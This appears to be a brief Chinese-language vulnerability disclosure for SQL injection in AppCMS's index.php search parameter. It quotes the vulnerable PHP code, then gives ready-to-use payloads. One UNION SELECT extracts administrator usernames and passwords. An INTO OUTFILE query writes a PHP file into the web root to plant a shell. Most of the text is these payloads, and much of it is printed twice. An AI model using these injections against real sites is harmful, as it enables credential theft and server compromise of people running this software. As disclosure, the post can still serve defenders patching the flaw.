appcms 主页注入漏洞

摘要

index.php if (trim($_GET['q']) != '' && !isset($_GET['tpl'])) { $str = ''; $sql = "SELECT app_id,app_title,app_down FROM " . TB_PREFIX . "app_list WHERE app_title LIKE '%" . trim($_GET['q']) . "%' LIMIT 15"; $app_list = $dbm ->query($sql); if (count($app_list['list']) > 0) { foreach ($app_list['list'] as $k => $v){ $app_list['list'][$k]['app_title'] = helper :: utf8_substr($v['app_title'], 0, 20); } echo json_encode($app_list['list']); exit; } else { exit; } } $_GET['q']直接带入查询
构造：
q=1%'union select 1,uname,upass from appcms_admin_list %23 1%’闭合前面的’% 使like语句完整 #注释掉后面语句 联合查询出数据
Sql语句变成
SELECT app_id,app_title,app_down FROM . TB_PREFIX . app_list WHERE app_title LIKE '%1%'union select 1,uname,upass from appcms_admin_list 写shell：

index.php

if (trim($_GET['q']) != '' && !isset($_GET['tpl'])) { $str = ''; $sql = "SELECT app_id,app_title,app_down FROM " . TB_PREFIX . "app_list WHERE app_title LIKE '%" . trim($_GET['q']) . "%' LIMIT 15"; $app_list = $dbm ->query($sql); if (count($app_list['list']) > 0) { foreach ($app_list['list'] as $k => $v){ $app_list['list'][$k]['app_title'] = helper :: utf8_substr($v['app_title'], 0, 20); } echo json_encode($app_list['list']); exit; } else { exit; } }

$_GET['q']直接带入查询
构造：

q=1%'union select 1,uname,upass from appcms_admin_list %23

1%’闭合前面的’% 使like语句完整 #注释掉后面语句 联合查询出数据
Sql语句变成

SELECT app_id,app_title,app_down FROM . TB_PREFIX . app_list WHERE app_title LIKE '%1%'union select 1,uname,upass from appcms_admin_list

写shell：

q=1%'union select 1,2,'aaa'  into outfile 'D://WWW//a.php' %23

语句变成：

SELECT app_id,app_title,app_down FROM . TB_PREFIX . app_list WHERE app_title LIKE '%1%'union select 1,2,'aaa' into outfile 'D://WWW//a.php'

作者：p0